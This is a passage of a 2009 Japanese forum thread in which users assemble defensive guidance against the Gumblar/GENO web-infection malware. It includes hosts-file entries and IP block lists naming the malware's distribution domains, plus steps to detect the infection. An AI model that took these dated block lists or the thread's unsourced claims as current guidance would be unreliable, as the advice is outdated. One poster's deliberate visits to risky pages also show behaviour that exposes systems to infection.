・ブラウザのキャッシュはこまめにクリアする(感染ページをPC内から完全に消す)
・危険IPのブロック(トロイの侵入を防ぐため)
 PeerGuardian2を導入。もしくはhosts書き換え
 ただしPG2は一部FWと競合する場合あり。


◆hosts書き換えの手順
 トロイの侵入を防ぐための予防策。ただし新しい配布元が増えると追加の必要あり

C:\Windows\System32\drivers\etc\ を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ(メモ帳でもよい)で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。



長くなったんでスレ1に貼る場合はhosts書き換え以下を分割がいいかな
感染確認用のテンプレが面倒すぐる。



390 :192.168.0.774:2009/05/18(月) 22:54:30 ID:mHe74bNo0
>>385
他人の書いたまとめ見て聞いてきたと言ったのか
むこうに行ってるなら全スレ自分の目でみてくればいいのに

391 :192.168.0.774:2009/05/18(月) 22:56:12 ID:IkAYi8V80
腐女子嫌いなセキュ板住人の自演の可能性も捨てきれないな

392 :192.168.0.774:2009/05/18(月) 22:56:13 ID:wU1qChfhP
>>383
テキトーならそんな解釈でいいよ。0.0.0.0は無意味な受け皿とでも思っとけ。

393 :371:2009/05/18(月) 22:56:55 ID:8wfIRV8X0
>>384 >>387 サンクスnliteでした。
>>389
>4.Adobe Acrobat Reader の最新版にアップデート
これもスクリプト実行するオプション指定が必要。

394 :192.168.0.774:2009/05/18(月) 22:57:00 ID:wYgtdtbN0
>>390
もう酷過ぎてみるに耐えない件 あいつらは一体何と戦っているんだ

395 :192.168.0.774:2009/05/18(月) 22:57:47 ID:buCstTcZ0
>>381
環境再構築が前提なら、やっとくにこしたことはない程度かなあ
腐ったSWF/PDFを無料点検とかで検出する場合もあって、
キャッシュに反応して、なんかおった!って大騒ぎしてもらってもタイヘンなので、
あんまり意味はなくても、キャッシュは掃除しとけって頼む習慣がついてるな

396 :192.168.0.774:2009/05/18(月) 22:58:43 ID:u1amOyBR0
FTPのパス収集してそこから改ざんしてるって事は、
ある日突然感染サイト全部がウイルス配布サイトになったりするかもしれんのか。
おおこわ。

397 :192.168.0.774:2009/05/18(月) 22:59:01 ID:gHdwI20D0
>>393
スタンドアロンのインストーラーが手に入る場所plz

398 :192.168.0.774:2009/05/18(月) 22:59:46 ID:3Wf1BgQ0O
もうセキュ板は叩き合いスレになってるな

399 :192.168.0.774:2009/05/18(月) 23:00:02 ID:nxw0+gd+0
hostsファイルって書き換えた後、また読み取り専用に戻したほうがいいよね?

400 :192.168.0.774:2009/05/18(月) 23:00:40 ID:6AKtRH9f0
>>399
おまじないみたいなもんさ

401 :192.168.0.774:2009/05/18(月) 23:01:08 ID:hM7YzxJQ0
これってブログも感染対象になるの?

402 :371:2009/05/18(月) 23:01:16 ID:8wfIRV8X0
>>397
ってか順番変えて2を4の後にすれば解決するね。

403 :192.168.0.774:2009/05/18(月) 23:01:36 ID:9T8t/wwO0
>>397
JSオフでも「ダウンロードが開始しない場合は、 ここをクリックしてください。」を
クリックしたら33MB強のファイルが落ちてくるからそれでいいんじゃない?

404 :192.168.0.774:2009/05/18(月) 23:03:18 ID:6AKtRH9f0
>>401
自分でScriptうpるかブログの鯖がやられないかぎり
今の所大丈夫

405 :192.168.0.774:2009/05/18(月) 23:03:58 ID:OzMjNB5E0
・・・なんでこのスレ開いた瞬間avast!たんが怒るねん?

406 :192.168.0.774:2009/05/18(月) 23:04:39 ID:jPv9twqC0
>>405
コードが貼ってありますねん。

407 :192.168.0.774:2009/05/18(月) 23:05:10 ID:hONTFHMO0
>>395
なるほど、再構築か・・・
対策に入れる目的がわかった
ありがとー

408 :192.168.0.774:2009/05/18(月) 23:05:43 ID:hM7YzxJQ0
>>404
ありがとー

409 :192.168.0.774:2009/05/18(月) 23:06:05 ID:6AKtRH9f0
avast激怒しかり、よくある質問解答集も必要なのか

410 :192.168.0.774:2009/05/18(月) 23:06:45 ID:DU0eHN8t0
>>383
そんな事気にするなら127.0.0.1にしとけよ

411 :192.168.0.774:2009/05/18(月) 23:06:57 ID:RCHjlpg60
>>394
IDが出ないだけでああも荒れるのもすごいな

412 :192.168.0.774:2009/05/18(月) 23:07:25 ID:6AKtRH9f0
>>406
IDが最先端だな

413 :192.168.0.774:2009/05/18(月) 23:07:33 ID:wsKEiiw60
■2chのスレを2chブラウザで開くとウイルスを検出する

ただのテキストのコードなのでウイルスに感染することはない、誤検出しないようにするには
1. avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に
2chブラウザのdatフォルダを設定
2. 2chブラウザでWebシールドを使わないように設定
ttp://ansitu.xrea.jp/guidance/?Trap#avast


414 :192.168.0.774:2009/05/18(月) 23:07:44 ID:2oOT4BL40
>>402
できればJSオフでVerUPできるのが理想だから、
あえてJSオフを先にしてる。

>>407
ま、キャッシュクリアしたって困ることないからね。

415 :192.168.0.774:2009/05/18(月) 23:08:34 ID:7k/9HGtp0 ?2BP(1)
あれ、ここには貼らなかったっけ

2chでスレを開いただけで対策ソフトが怒り出す件
http://www29.atwiki.jp/geno/pages/23.html

416 :192.168.0.774:2009/05/18(月) 23:09:51 ID:REWakbthP
ここ最近、IEが異常終了することが多いので
気になって全てチェックしたけど感染してなかった
なんで異常終了するんだよ ヽ(`Д´)ノウワァァァン

417 :192.168.0.774:2009/05/18(月) 23:10:49 ID:gHdwI20D0
>>402
やっぱそっちに戻した方が楽かな。作業少なくて済むし

>>403
確認した。

>>414
どっちがいいかね。あくまで詳しくない人相手で考えてるけど

418 :192.168.0.774:2009/05/18(月) 23:11:22 ID:hONTFHMO0
>>414
履歴さえあれば、ある程度追いかけられるし
キャッシュが必要かと言われれば 必要ない と思うね

納得できたよ

419 :192.168.0.774:2009/05/18(月) 23:11:44 ID:mHe74bNo0
>>409
avast激怒は1に書けばいいさ
アホがまたはる可能性あるからな

質問集はwikiみろでいいんじゃね

420 :192.168.0.774:2009/05/18(月) 23:11:55 ID:u1amOyBR0
ここの人たちだけが頼りになる。

421 :192.168.0.774:2009/05/18(月) 23:12:43 ID:6AKtRH9f0
>>416
Windows
ttp://pc12.2ch.net/win/
気になるなら↑の質問スレで聞いてみたら

422 :192.168.0.774:2009/05/18(月) 23:12:45 ID:FYugBiBP0
感染したPCとLANで繋がっていたPCのパスワードも盗み見されているから、
他のPCで使っていたパスも変えたほうがいいよ

423 :192.168.0.774:2009/05/18(月) 23:13:31 ID:+m52NSIq0
なんかもうテンプレ作るよりこのスレをブログで紹介した方が早い気がしてきた。


424 :192.168.0.774:2009/05/18(月) 23:14:31 ID:+m52NSIq0
>>422
今回のウイルスってそんなところまで深追いしてくるの?!

425 :192.168.0.774:2009/05/18(月) 23:14:41 ID:WoowZG+dO
2000ならsqlsodbc.exeがなければ大丈夫らしいけど何故かcmdが起動しない…
これって感染してる?
一応regeditの方は起動できる

426 :192.168.0.774:2009/05/18(月) 23:15:27 ID:REWakbthP
Adobe ReaderとFlash Playerを最新版したら100パー感染しないの?

427 :192.168.0.774:2009/05/18(月) 23:15:50 ID:9T8t/wwO0
>>425
sqlsodbc.chmな

2000ならこれが存在していればまずアウト、念のためファイルサイズもbyte単位で

428 :192.168.0.774:2009/05/18(月) 23:16:24 ID:KMNBjNoi0
>>425
リカバリしろハゲ

429 :192.168.0.774:2009/05/18(月) 23:16:57 ID:yaVwoLmK0
>>420
>>423
セキュ板があれじゃぁ、こっちも時間の問題かもね。

430 :192.168.0.774:2009/05/18(月) 23:17:54 ID:A7QBAwqa0
>>422
そんな情報今までなかったけどソースある?
LAN内感染するならブロードキャストドメイン内が感染するってことだよね?

431 :192.168.0.774:2009/05/18(月) 23:18:09 ID:6AKtRH9f0
>>419
ああ、そうだねそうだった

>>422
うそん?感染したホスト以外のファイルのパス(位置)は探し出せないはずなんだがね
そもそもPCパスが何を指しているのか不明だが、ログインパスワードならもっての他

432 :192.168.0.774:2009/05/18(月) 23:18:38 ID:JmCcr4Q60
>>427
一応一部環境では2kでもsqlsodbc.chmが存在してもおかしく無い場合もある。
サイズが46〜50kならまぁ大丈夫、1kとか2kぐらいの小さい奴だとアウトの可能性大

433 :192.168.0.774:2009/05/18(月) 23:18:40 ID:RCHjlpg60
>>429
ID見えるからあぼーんし放題ってことでこっち避難したんじゃなかったか?

434 :192.168.0.774:2009/05/18(月) 23:19:13 ID:ua7Ctj4Z0
>>358
◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
 PeerGuardian2を導入。もしくはhosts書き換え
 ただしPG2は一部FWと競合する場合あり。

        ↓問題点↓

・キャッシュクリアは予防策としては意味が無い。消したキャッシュに危険なものがあれば既に感染済みなので
 予防になりようがない。危険なものがないのにキャッシュクリアした場合は予防として無意味。
・hostsとIPブロックは別のもの。併用が望ましい。

        ↓改定案↓

◇そのほか予防策
・危険IPのブロック
 セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
 ただしPG2は一部FWと競合する場合あり。
 ・推奨されるブロック範囲
  martuz.cn:95.129.144.0-95.129.145.255
 ・予防的に設定する範囲
  gumblar-russian:94.229.64.0-94.229.79.255
・hosts書き換えで、危険ドメインに繋がらなくする
  127.0.0.1 martuz.cn
  127.0.0.1 gumblar-russian
  #127.0.0.1 hs.2-195.zlkon.lv
−−−−−
IPブロックの効能
 ・危険IPに接続できなくなるので、危険ファイルに接続できなくなる効果が見込める。
 ・PCのOS入れなおしに時間がかかる場合、IPブロックによって盗まれた情報を送信できなく
  することで、HP更新の応急処置をすることが可能かもしれない。
  但し、盗まれたデータの送信先を突き止めないとブロック対象がわからないのが問題。
 ・ネトゲのアカウントハッキングならCNを全ブロックでいいのですが、今回のものは
  複数の国のドメインを渡り歩いているので、ブロック範囲を絞りこめません。
  危険ファイルへのアクセスをブロックする効能だけでよしとしましょう
hosts変更の効能
 スクリプトが呼び出すのがドメイン名の場合、DNSより先に参照されるhostsの登録先を
 変更することで、危険ファイルの置いてある場所に繋がらなくする効果が見込める。

435 :192.168.0.774:2009/05/18(月) 23:19:33 ID:KxPBQ8Is0
>>427
アウトじゃないよ
md5確認しろよ

436 :192.168.0.774:2009/05/18(月) 23:20:07 ID:FTMobkHsO
ニフティのオンラインスキャンでロックかかってスキャンされなかったファイルあるけど
それは普通に気にしなくて大丈夫なんだろうか?

437 :192.168.0.774:2009/05/18(月) 23:20:35 ID:ua7Ctj4Z0
>>358,>>389
(続き)

gumblar.cn:94.229.65.172は、正引きできないようになっている為。
生IPはサーバーの応答が停止しているものの生きている状態です。
現在はブロックしても無意味ですが、動作再開の時の為に予防的にブロック。

zlkon.lv:94.247.2.195 : hs.2-195.zlkon.lvは、ドメイン名でも生IPでも
応答停止のため登録する意味はありません。

zlkon.lvと完全一致する名前での攻撃がないため登録しても無意味とのこと。
hs.2-195.zlkon.lv という名称で登録してもいいが別名もあり効果は見込めないで
あろうとのこと。サーバー自体が死亡しているので、登録不要のようです。

438 :192.168.0.774:2009/05/18(月) 23:21:01 ID:9T8t/wwO0
>>432
うん、だからファイルサイズも要求してみた
普通の環境だとまず無いと思ってるから

439 :192.168.0.774:2009/05/18(月) 23:21:47 ID:ua7Ctj4Z0
間違えた。

◇そのほか予防策
・危険IPのブロック
 セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
 ただしPG2は一部FWと競合する場合あり。
 ・推奨されるブロック範囲
  martuz.cn:95.129.144.0-95.129.145.255
 ・予防的に設定する範囲
  gumblar-russian:94.229.64.0-94.229.79.255
・hosts書き換えで、危険ドメインに繋がらなくする
  127.0.0.1 martuz.cn
  127.0.0.1 gumblar.cn
  #127.0.0.1 hs.2-195.zlkon.lv

440 :192.168.0.774:2009/05/18(月) 23:22:16 ID:wU1qChfhP
sqlsodbc.chmはヘルプファイルとして開けるかが一番重要なんじゃないか

441 :192.168.0.774:2009/05/18(月) 23:24:40 ID:buCstTcZ0
>>440
そういうこといってると、正常な.chmファイルのケツにくっつけるように仕様変更されてきたら
びみょーにかっちょわるいから、あんまアテにせんほうがいいw 現時点仕様としては正解

442 :192.168.0.774:2009/05/18(月) 23:25:50 ID:TTbAOLbH0
>>434でhosts書き換えが127.0.0.1に変わってるのは何か意図があってのこと?
それとも気まぐれ?

443 :192.168.0.774:2009/05/18(月) 23:26:03 ID:+m52NSIq0
>>439
GJであります!

444 :192.168.0.774:2009/05/18(月) 23:26:32 ID:REWakbthP
これはルーターを介しても感染するの?

445 :192.168.0.774:2009/05/18(月) 23:26:35 ID:gHdwI20D0
>>434,437,439
PGはよく把握してないんで助かる。予防策以下は分割にしよう


446 :192.168.0.774:2009/05/18(月) 23:27:24 ID:JmCcr4Q60
>>442
127.0.0.1は自PCへのループバック。
0.0.0.0はネットワーク上に存在しないIPアドレス。
外に繋がらんっつー意味では変わらんからおk

447 :192.168.0.774:2009/05/18(月) 23:27:33 ID:sW8zDo3k0
ht p://ruru2.net/jlab-ruru/s/ruru1242650727221.jpg
これ大丈夫かな?



448 :192.168.0.774:2009/05/18(月) 23:29:12 ID:oH14GReB0
鑑定スレじゃないんで

449 :402:2009/05/18(月) 23:29:54 ID:8wfIRV8X0
>>403 >>414
確認した。
うーん普段JS実行がデフォでポップアップするのに慣れてるからか
始まらない場合をクリックする前にJS実行に戻してからインスコしなおした俺w
これでどうかな?

4.Adobe Acrobat Reader の最新版にアップデート
(「ダウンロードが開始しない場合は、 ここをクリックしてください。」をクリックする。)

これでどうかな?

450 :192.168.0.774:2009/05/18(月) 23:31:20 ID:9T8t/wwO0
>>439
>   martuz.cn:95.129.144.0-95.129.145.255

これの表記は 95.129.144.0/23 で合ってるかな?
いまいち苦手だわ

451 :192.168.0.774:2009/05/18(月) 23:31:48 ID:1Vv3aDYa0
>>439
これ最後の一行が#で無効にならない?

452 :192.168.0.774:2009/05/18(月) 23:32:24 ID:9T8t/wwO0
>>449
それでおkじゃないかな
てかFlashも同じようにしてくれればいいのに・・・・<Adobe

453 :192.168.0.774:2009/05/18(月) 23:34:22 ID:WoowZG+dO
>>427
sqlsodbc.で検索したらhlp(17KB)が出てきたけどchmはなかった

454 :192.168.0.774:2009/05/18(月) 23:34:46 ID:gHdwI20D0
>>449
固定のリンク拾ったから多分平気
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe


455 :192.168.0.774:2009/05/18(月) 23:34:51 ID:+m52NSIq0
>>450
>95.129.144.0/23
これに直す必要があるファイアウォールを使用していたりするの?
PG2やOutpostだとこの表記(95.129.144.0-95.129.145.255)で利用した方がいいけど。

456 :192.168.0.774:2009/05/18(月) 23:36:03 ID:2oOT4BL40
>>441
仮にもウイルス動作のキーと目されてるファイルを開くって行為も
個人的には怖い。
自分はエディタの先頭ヘッダ見て正常を確認したけど、
普通の人には酷だし、それ(フッタに追加)やられると分からなくなるしなぁ・・・。

457 :192.168.0.774:2009/05/18(月) 23:36:25 ID:wsKEiiw60
>>453
それ中身読める?

458 :192.168.0.774:2009/05/18(月) 23:36:27 ID:JmCcr4Q60
>>451
>437だからほとんど無意味だから無効にしてあるんじゃね?
おそらく自前で設定したhostsからコピペしたんだろw

459 :192.168.0.774:2009/05/18(月) 23:36:48 ID:9T8t/wwO0
>>455
バスターは範囲指定出来るけど、ルータの方が範囲指定駄目なんだよね
192.168.0.0/16とか指定しないと駄目

460 :192.168.0.774:2009/05/18(月) 23:38:25 ID:REWakbthP
ファイヤーウォールのログ見ても
怪しいIP無かったよ

461 :192.168.0.774:2009/05/18(月) 23:40:47 ID:ua7Ctj4Z0
>>442
0.0.0.0だと、デフォルトゲートウェイ宛になってしまうので余り望ましくなかった筈。
ローカルループバックの127.0.0.1の方なら安心かと。

462 :192.168.0.774:2009/05/18(月) 23:42:49 ID:ua7Ctj4Z0
>>451
>458が代わりに回答してくれた。登録しなくていいよという意味。(どこいったとか質問されるよりコメントアウトのがいいかなと)

463 :192.168.0.774:2009/05/18(月) 23:44:26 ID:duvNIOfD0
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック テンプレサイトの焼却炉のブロックIP
58.65.232.0 - 58.65.239.255
61.139.0.0 - 61.139.127.255
61.219.39.0 - 61.219.39.255
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255
63.146.2.0 - 63.146.2.255
69.46.0.0/19 (69.46.0.0 - 69.46.31.255)
74.220.215.0-74.220.215.255
78.109.16.0/20 (78.109.16.0 - 78.109.31.255)
78.159.112.0 - 78.159.115.255
82.146.48.0/21 (82.146.48.0 - 82.146.55.255)
83.68.16.0 - 83.68.16.255
85.12.43.0 - 85.12.43.255
85.14.6.0 - 85.14.6.255
85.17.0.0 - 85.17.255.255 (CIDR:85.17.0.0/16)
85.214.90.0 - 85.214.90.255
91.211.64.0/23
91.212.41.0/24
91.212.65.0/24
91.212.41.0- 91.212.41.255
91.212.41.0/24 (91.212.41.0 - 91.212.41.255)
94.232.248.0 - 94.232.255.255
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
94.247.2.0 - 94.247.3.255
194.165.4.0/23 (194.165.4.0 - 194.165.5.255)
195.2.252.0/23 (195.2.252.0 - 195.2.253.255)
195.216.160.0 - 195.216.191.255
206.44.0.0 - 206.44.255.255 CIDR:(206.44.0.0/16)
209.44.100.0/24
209.44.126.0/24
209.62.7.0/24
209.102.247.0/24
209.250.241.0/24
209.205.192.0-209.205.223.255
209.205.224.0-209.205.239.255
211.90.0.0 - 211.97.255.255
213.182.192.0 - 213.182.223.255
218.90.0.0 - 218.94.255.255     をして、まだ誰にも知られてない感染サイトに行きNoScriptをオフにしたら感染しますか?

464 :192.168.0.774:2009/05/18(月) 23:45:56 ID:WoowZG+dO
>>457
普通に読めた

465 :192.168.0.774:2009/05/18(月) 23:48:08 ID:1Vv3aDYa0
>>458>>462
そか 忙しいのにありがとね

466 :192.168.0.774:2009/05/18(月) 23:48:43 ID:gHdwI20D0

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
OSクリーンインストール一択

◆対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

1.Windows Updateをやる

2.使用しているブラウザのJavaScriptをオフにする。これ重要
 (FirefoxならNoscript導入が便利)

3.Adobe Flash Player の最新版にアップデート
 JSオフだと更新できないので↓のリンクからインストーラーを落として入れる
 IE版     ttp://www.macromedia.com/go/full_flashplayer_win_ie
 その他版  ttp://www.macromedia.com/go/full_flashplayer_win

4.Adobe Acrobat Reader の最新版にアップデート
 3と同様にインストーラーをダウンロードして入れる
 ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
 インストールが終わったらAdobe Readerを起動し
 メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
 終わったらバージョンチェックして下記の数字になっていればok

5.Adobe Acrobat Readerの JavaScript 機能OFFにする

6.セキュリティ対策ソフトもパターンを最新に更新

2009/05/18時点での最新版
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1

Flash Playerのバージョンチェックはここで(JS、AXをオンにする必要あり)
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm



短くなったついでで手順を書いてみた。5についても余裕があれば手順追記を

467 :192.168.0.774:2009/05/18(月) 23:49:09 ID:AisdkmaG0
>>450
95.129.144.0/24
95.129.145.0/24

の二つ登録すれば?
計算しなくてすむっしょw

468 :192.168.0.774:2009/05/18(月) 23:50:35 ID:pkmxa1yn0
クリーンインストールするのはいいけど、システム関係以外のファイルは問題ないの?

469 :192.168.0.774:2009/05/18(月) 23:52:35 ID:9T8t/wwO0
>>467
わかりやすいからそれ採用!
thx

470 :192.168.0.774:2009/05/18(月) 23:53:52 ID:wsKEiiw60
>>464
http://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

の現鑑定方法では白ですね

【何故かcmdが起動しない】でどこかで質問してはいかがでしょうか


471 :192.168.0.774:2009/05/18(月) 23:54:06 ID:8wfIRV8X0
>>466 乙です。

472 :192.168.0.774:2009/05/18(月) 23:56:33 ID:GMquw4xX0
暇だから計算してみたけど>>450のであってるね

473 :192.168.0.774:2009/05/18(月) 23:57:36 ID:eOHkXG3n0
>>466
対策なら、Adobe Flash Player,
Adobe Acrobat Readerを最新版にしてから
JavaScriptをオフにさせれば、楽じゃね?

474 :192.168.0.774:2009/05/19(火) 00:02:39 ID:YC0lFU1F0
完成した

cnなどの怪しいトップレベルドメインは全て遮断
94.229.65.172など、IPアドレスを全て遮断
2chは全て許可

手始めに、IE ActiveX JavaScript共にONで
勇気がなくて踏めない人のための鑑定スレを手当たり次第踏んでくるよ!
http://pc11.2ch.net/test/read.cgi/hack/1230787611/

475 :192.168.0.774:2009/05/19(火) 00:03:37 ID:KcXZhps00
>413
って自分もただのテキストコードだと思ってたんだけどさ、
レジストリ書き換えようとしてくるよ?spybotが反応する。
ブラウザのただのchromeだし。
こういう場合も大丈夫なのかな?
ちなみにavastが鳴ったのは邦楽ソロ(男性)板。

476 :192.168.0.774:2009/05/19(火) 00:04:24 ID:JmCcr4Q60
>>473
>414 JSが動いてない状態ならPDFのDL等が起きず、その後の進行もなくなる。
だから優先度としてはブラウザのJSオフを先に〜という流れなのさ。
楽だから後に〜というのは対策としてはベターじゃないよね?

477 :192.168.0.774:2009/05/19(火) 00:04:41 ID:ehqW54OZ0
無茶しやがって

478 :192.168.0.774:2009/05/19(火) 00:04:52 ID:WoowZG+dO
>>470
cmdのことが気掛かりだけどとりあえず白か…
サンクス

479 :192.168.0.774:2009/05/19(火) 00:05:19 ID:gcscOsPA0
>>475
バカはケータイ使ってろ

480 :192.168.0.774:2009/05/19(火) 00:08:11 ID:GnfA5Sz80
>>373
新パスと同じ文字列をクリーンインストール前の感染PCで
FTP以外のログイン等に使用した記憶はない?

481 :192.168.0.774:2009/05/19(火) 00:08:40 ID:WSVhxRbK0
かなり厄介なウィルスなのに本当にニュースになってないな。
マジでクリーンインストールするか迷ってる。
手っ取り早くデーター移せる外付けHDDがほしいぜ。

482 :192.168.0.774:2009/05/19(火) 00:09:56 ID:djYcVACO0
>>473
よく分からない人にはそっちの方が説明楽でいいんだがな。
どっちの状態でも出来るようにしてみた



3.Adobe Flash Player の最新版にアップデート → ttp://get.adobe.com/jp/flashplayer/
 JSオフで更新できない場合↓のリンクからインストーラーを落として入れる
 IE版      ttp://www.macromedia.com/go/full_flashplayer_win_ie
 その他版  ttp://www.macromedia.com/go/full_flashplayer_win

4.Adobe Acrobat Reader の最新版にアップデート → ttp://get.adobe.com/jp/reader/
 3と同様の場合、↓からインストーラーをダウンロードして入れる
 ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
 インストールが終わったらAdobe Readerを起動し
 メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
 終わったらバージョンチェックして下記の数字になっていればok




483 :192.168.0.774:2009/05/19(火) 00:10:18 ID:jMm0kyue0
スキル無い俺は当分2chにひきこもろw

484 :192.168.0.774:2009/05/19(火) 00:11:18 ID:vElGKTyLP
対策は全部した。
でもIEがたまに強制終了するよ

485 :192.168.0.774:2009/05/19(火) 00:13:02 ID:eCUy3/Fb0
>>483
引き篭もって早二日だぜ
暇すぎる

486 :192.168.0.774:2009/05/19(火) 00:13:55 ID:zf5ipXqL0
偽装画像とかでの感染もあるんだろ?
そっちがきたらJSオフもAdobe最新にしてても意味ないんだよな?
Adobeを使わないタイプの割合ってどんなもんなんだ?

487 :192.168.0.774:2009/05/19(火) 00:15:33 ID:nSOdGQK70
インターネットオプションの「拡張子ではなく、内容によってファイルを開く」も
無効にしとけばより強固になるよ(色々不便な事も出てくるけど)

488 :192.168.0.774:2009/05/19(火) 00:16:57 ID:xod3EvsV0
AdobeのサイトでReaderをダウンロードしようとすとIE8が
サイトをブロックして出来ない。

489 :192.168.0.774:2009/05/19(火) 00:17:52 ID:djYcVACO0

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
OSクリーンインストール一択

◆対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

1.Windows Updateをやる

2.使用しているブラウザのJavaScriptをオフにする。※これ重要
 (FirefoxならNoscript導入が便利)

3.Adobe Flash Player の最新版にアップデート → ttp://get.adobe.com/jp/flashplayer/
 JSオフだと更新できないので、その場合は↓のリンクからインストーラーを落として入れる
 IE版      ttp://www.macromedia.com/go/full_flashplayer_win_ie
 その他版  ttp://www.macromedia.com/go/full_flashplayer_win

4.Adobe Acrobat Reader の最新版にアップデート → ttp://get.adobe.com/jp/reader/
 うまく更新できない場合↓のインストーラーをダウンロードして入れる
 ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
 インストールが終わったらAdobe Readerを起動し
 メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
 終わったらバージョンチェックして下記の数字になっていればok

5.Adobe Acrobat Readerの JavaScript 機能OFFにする

6.セキュリティ対策ソフトもパターンを最新に更新

2009/05/18時点での最新版
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1

Flash Playerのバージョンチェックはここで(JS、AXをオンにする必要あり)
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm



490 :192.168.0.774:2009/05/19(火) 00:19:03 ID:7aDdcSTE0
感染したかの判別法で明確なのってきてるの?
regeditやcdm.exeが動かないってのではもう無理なの?

491 :192.168.0.774:2009/05/19(火) 00:19:17 ID:djYcVACO0

◆そのほか予防策
・危険IPのブロック
 セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
 ただしPG2は一部FWと競合する場合あり。
 ・推奨されるブロック範囲
  martuz.cn:95.129.144.0-95.129.145.255
 ・予防的に設定する範囲
  gumblar-russian:94.229.64.0-94.229.79.255

・hosts書き換えで、危険ドメインに繋がらなくする
C:\Windows\System32\drivers\etc\ を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ(メモ帳でもよい)で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
127.0.0.1 martuz.cn
127.0.0.1 gumblar.cn
127.0.0.1 hs.2-195.zlkon.lv

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。


◇IPブロックの効能
 ・危険IPに接続できなくなるので、危険ファイルに接続できなくなる効果が見込める。
 ・PCのOS入れなおしに時間がかかる場合、IPブロックによって盗まれた情報を送信できなく
  することで、HP更新の応急処置をすることが可能かもしれない。
  但し、盗まれたデータの送信先を突き止めないとブロック対象がわからないのが問題。
 ・ネトゲのアカウントハッキングならCNを全ブロックでいいのですが、今回のものは
  複数の国のドメインを渡り歩いているので、ブロック範囲を絞りこめません。
  危険ファイルへのアクセスをブロックする効能だけでよしとしましょう

◇hosts変更の効能
  ・スクリプトが呼び出すのがドメイン名の場合、DNSより先に参照されるhostsの登録先を
   変更することで、危険ファイルの置いてある場所に繋がらなくする効果が見込める。


gumblar.cn:94.229.65.172は、正引きできないようになっている為。
生IPはサーバーの応答が停止しているものの生きている状態です。
現在はブロックしても無意味ですが、動作再開の時の為に予防的にブロック。

zlkon.lv:94.247.2.195 : hs.2-195.zlkon.lvは、ドメイン名でも生IPでも
応答停止のため登録する意味はありません。

zlkon.lvと完全一致する名前での攻撃がないため登録しても無意味とのこと。
hs.2-195.zlkon.lv という名称で登録してもいいが別名もあり効果は見込めないで
あろうとのこと。サーバー自体が死亡しているので、登録不要のようです。


492 :192.168.0.774:2009/05/19(火) 00:19:44 ID:nSOdGQK70
>>489

こっちはそろそろ寝る、また明日の夜来るけどその頃には次スレ行ってそうだな

493 :192.168.0.774:2009/05/19(火) 00:20:16 ID:Hijrc51m0
>>490
動く亜種も出てきてるって話

494 :192.168.0.774:2009/05/19(火) 00:21:32 ID:djYcVACO0

とりあえず現在のテンプレ案が>>489,491
都合によりいいかげん寝なくてはならんので協力してくれた諸氏には申し訳ないが、後を頼む
         _,,..,,,,_ . _
        ./ ,' 3 /   ヽ--、
        l   /        ヽ、
       /`'ー/_____/
        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


495 :192.168.0.774:2009/05/19(火) 00:23:43 ID:o4562oQV0
>>482
感染していないことを前提にしているのだから
なるべく手続きは簡単な方が初心者には親切。
Windows Updateから、すぐに最新版を導入のページに
いくように指示すれば、その次にJavaScriptをオフにしても
それほど問題はないとおもわれる。

496 :192.168.0.774:2009/05/19(火) 00:25:04 ID:NWiPjNpy0

ただいま生還しました>>474です。
相当に危険なURLが埋め込まれていまいたが無事に帰ってきました。

497 :192.168.0.774:2009/05/19(火) 00:26:49 ID:WSyhd7W40
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

ウイルス概要 感染予防 感染チェック 感染後の処置まですべて

498 :192.168.0.774:2009/05/19(火) 00:28:42 ID:o4562oQV0
>>495
自己補足として、
誰が読んでも分かるようにするためには
長いテンプレは、出来るだけさける。

それと
Vistaの場合は、UACってなに?有効かどうかどうやって確かめるの?
というのをよく聞かれた。

499 :192.168.0.774:2009/05/19(火) 00:29:26 ID:5Ze0uUiy0
有益な情報なんにも出せないROM専がでしゃばってすまんが
テンプレ案書く時は名前欄に「テンプレ案」とか入れとくと見やすいんじゃね? とか思った


500 :192.168.0.774:2009/05/19(火) 00:30:12 ID:7aDdcSTE0
>>493
そっか、本当おっかないな
